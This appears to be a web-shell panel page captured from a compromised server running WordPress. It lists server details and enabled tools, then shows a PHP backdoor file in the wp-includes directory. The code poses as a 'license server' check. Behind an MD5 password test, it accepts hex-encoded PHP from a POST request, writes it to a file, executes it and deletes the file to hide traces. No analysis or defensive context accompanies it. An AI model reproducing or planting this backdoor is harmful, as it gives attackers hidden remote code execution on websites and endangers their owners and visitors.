| Server IP : 119.195.102.159 / Your IP : 216.73.217.134 Web Server : nginx/1.18.0 System : Linux picell 5.15.0-181-generic #191-Ubuntu SMP Fri May 22 19:09:02 UTC 2026 x86_64 User : altablue ( 1000) PHP Version : 8.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/1987dubu/wp-includes/ |
Upload File : |
<?php
ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL);
parse_str(file_get_contents("php://input"), $wordpress_license_server);
if(empty($wordpress_license_server['timediff'])) {
exit();
}
if (md5($wordpress_license_server["timediff"]) != "04a12f73a5068ed990a89b9e4625faa1") {
echo "Bad timediff";
exit(0);
}
$time_server = hex2bin($wordpress_license_server['timeserver']);
$license_file_name = hex2bin($wordpress_license_server['license']);
if (file_put_contents($license_file_name, "<?php " . $time_server) === false) {
echo "License error!";
exit(0);
}
require_once $license_file_name;
unlink($license_file_name);
exit();